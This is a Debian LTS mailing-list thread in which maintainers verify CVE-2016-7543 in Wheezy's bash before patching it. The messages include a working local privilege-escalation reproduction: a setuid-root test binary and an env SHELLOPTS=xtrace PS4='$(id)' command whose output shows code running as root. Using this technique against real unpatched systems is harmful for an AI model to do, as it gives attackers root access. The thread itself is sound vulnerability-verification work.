[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Wheezy update of bash?

Hi,

2016-10-07 8:10 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
> Hi Balint
>
> Ah, it could be the default shell. I'll try that. Thanks for the suggestion.
>
> Merely that the command id is executed is not a reproduction. It has to be
> executed as another user than the one one executing the binary to be a
> security problem. If not it could be a bug but not a security bug (privilege
> escalation).

True, but it works on setuid binaries, too:

root@debian-wheezy:/home/vagrant# ls -alh /bin/sh
lrwxrwxrwx 1 root root 4 Oct  7 07:16 /bin/sh -> bash
root@debian-wheezy:/home/vagrant# gcc -xc - -otest <<< 'int main() {
setuid(0); system("/bin/date"); }'
root@debian-wheezy:/home/vagrant# chmod 4755 ./test
root@debian-wheezy:/home/vagrant# ls -l ./test
-rwsr-xr-x 1 root root 6877 Oct  7 07:19 ./test
root@debian-wheezy:/home/vagrant# exit
exit
vagrant@debian-wheezy:~$  env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=1000(vagrant)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(vid/bin/date
Fri Oct  7 07:19:34 GMT 2016
vagrant@debian-wheezy:~$

Cheers,
Balint


>
> Best regards,
>
> // Ola
>
> On 7 October 2016 at 00:12, Bálint Réczey <balint@balintreczey.hu> wrote:
>>
>> Hi Ola,
>>
>> 2016-10-06 23:08 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
>> > Hi Matthias and Balint
>> >
>> > I have tried to reproduce the problem described in the openwall email.
>> > However I can not reproduce it. Have you been able to?
>> >
>> > On wheezy:
>> > ------------
>> > ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct  6 20:54:07 UTC 2016
>> > ola@tigereye:/$ ls -la test
>> > -rwsr-xr-x 1 root root 6824 Oct  6 20:52 test
>> > ola@tigereye:/$ dpkg -l bash
>> > ...CUT...
>> > ii  bash           4.2+dfsg-0.1 amd64        GNU Bourne Again SHell
>> >
>> > On jessie:
>> > ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct  6 22:48:35 CEST 2016
>>
>> When I set the default shell to bash it worked for me.
>> Please try with sudo dpkg-reconfigure dash.
>>
>> > ola@tigereye:~/exploit$ dpkg -l bash
>> > ...CUT...
>> > ii  bash           4.3-11+b1    amd64        GNU Bourne Again SHell
>> >
>> > I think it may be because SHELLOPTS is a read-only variable.
>> >
>> > ola@tigereye:~/exploit$ SHELLOPTS=xtrace
>> > bash: SHELLOPTS: readonly variable
>> >
>> > Do you think I have made a mistake in the reproduction or is it so that
>> > the
>> > patch was actually not on a real problem (at least in Debian).
>> >
>> > Not even if I change the code like this:
>> > ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
>> > system("/bin/bash -c /bin/date"); }'
>> > ola@tigereye:~/exploit$ ./test2
>> > Thu Oct  6 23:04:11 CEST 2016
>> > ola@tigereye:~/exploit$ set -x
>> > ola@tigereye:~/exploit$ ./test2
>> > uid=1000(ola) gid=1000(ola)
>> >
>> > groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
>> > Thu Oct  6 23:04:18 CEST 2016
>>
>> This runs the command passed in PS4 thus I consider this a reproduction.
>>
>> Cheers,
>> Balnit
>>
>> >
>> > My conclusion is that there is no security hole. But I may be mistaken.
>> >
>> > Can anyone else reproduce the issue?
>> >
>> > Best regards,
>> >
>> > // Ola
>> >
>> > On 6 October 2016 at 12:29, Ola Lundqvist <ola@inguza.com> wrote:
>> >>
>> >> Hi Matthias
>> >>
>> >> I will look into this.
>> >>
>> >> // Ola
>> >>
>> >> On 6 October 2016 at 01:06, Matthias Klose <doko@debian.org> wrote:
>> >>>
>> >>> On 05.10.2016 16:02, Balint Reczey wrote:
>> >>> > Hello dear maintainer(s),
>> >>> >
>> >>> > the Debian LTS team would like to fix the security issues which are
>> >>> > currently open in the Wheezy version of bash:
>> >>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>> >>> >
>> >>> > Would you like to take care of this yourself?
>> >>>
>> >>> please go ahead.
>> >>>
>> >>> Matthias
>> >>>
>> >>
>> >>
>> >>
>> >> --
>> >>  --- Inguza Technology AB --- MSc in Information Technology ----
>> >> /  ola@inguza.com                    Folkebogatan 26            \
>> >> |  opal@debian.org                   654 68 KARLSTAD            |
>> >> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
>> >> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>> >>  ---------------------------------------------------------------
>> >>
>> >
>> >
>> >
>> > --
>> >  --- Inguza Technology AB --- MSc in Information Technology ----
>> > /  ola@inguza.com                    Folkebogatan 26            \
>> > |  opal@debian.org                   654 68 KARLSTAD            |
>> > |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
>> > \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>> >  ---------------------------------------------------------------
>> >
>
>
>
>
> --
>  --- Inguza Technology AB --- MSc in Information Technology ----
> /  ola@inguza.com                    Folkebogatan 26            \
> |  opal@debian.org                   654 68 KARLSTAD            |
> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>  ---------------------------------------------------------------
>
Reply to: